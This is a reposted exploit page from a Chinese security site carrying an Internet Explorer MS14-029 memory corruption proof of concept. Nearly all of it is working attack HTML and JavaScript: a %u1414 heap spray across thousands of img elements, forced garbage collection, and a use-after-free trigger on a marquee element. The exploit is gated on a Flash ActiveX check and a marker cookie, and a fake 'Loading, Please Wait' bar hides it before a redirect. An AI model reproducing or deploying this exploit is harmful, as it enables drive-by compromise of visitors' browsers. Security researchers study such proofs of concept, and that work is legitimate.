首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer MS14-029 Memory Corruption PoC
来源:vfocus.net 作者:PhysicalDrive0 发布时间:2014-08-29  
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<sc​ript >
func​tion stc()
{
var Then = new Date();
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
func​tion cid()
{
var swf = 0;
try {
swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
}
if (!swf)
return 0;
var cookieString = new String(document.cookie);
if(cookieString.indexOf("d93kaj3Nja3") == -1)
{stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=func​tion (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=un​escape ("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.create​Element("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
func​tion b2()
{
try{xdd.re​placeNode(document.createTextNode(" "));}catch(exception){}
try{xdd.outerText='';}catch(exception){}
CollectGarbage();
for(i=0;i<3333;i++) ll[i].className=tpx;
}
func​tion a1(){
if (!cid())
return;
document.body.contentEditable="true";
try{xdd.applyElement(document.create​Element("frameset"));}catch(exception){}
try{document.selection.createRange().select();}catch(exception){}
}
</ sc​ript >
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd > </marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
¡¡¡¡
¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
¡¡¡¡<sc​ript > ¡¡
var bar=0¡¡
var line="||"¡¡
var amount="||"¡¡
count()¡¡
func​tion count(){¡¡
bar=bar+2¡¡
amount =amount + line¡¡
document.loading.chart.value=amount¡¡
document.loading.percent.value=bar+"%"¡¡
if (bar<99)¡¡
{setTimeout("count()",500);}¡¡
else¡¡
{window.location = "http://www.google.com.hk";}¡¡
}</ sc​ript >
¡¡</p>
</form>
<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
</body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Firefox WebIDL Privileged Java
·Plogger 1.0-RC1 - Authenticate
·glibc Off-by-One NUL Byte gcon
·ActualAnalyzer Lite 2.81 - Una
·Grand MA 300 Fingerprint Reade
·PhpWiki - Remote Command Execu
·SMF Flood Filter Issue
·XRMS - Blind SQL Injection and
·ManageEngine Password Manager
·NRPE 2.15 Remote Command Execu
·Air Transfer Iphone 1.3.9 - Mu
·HTML Help Workshop 1.4 - (SEH)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved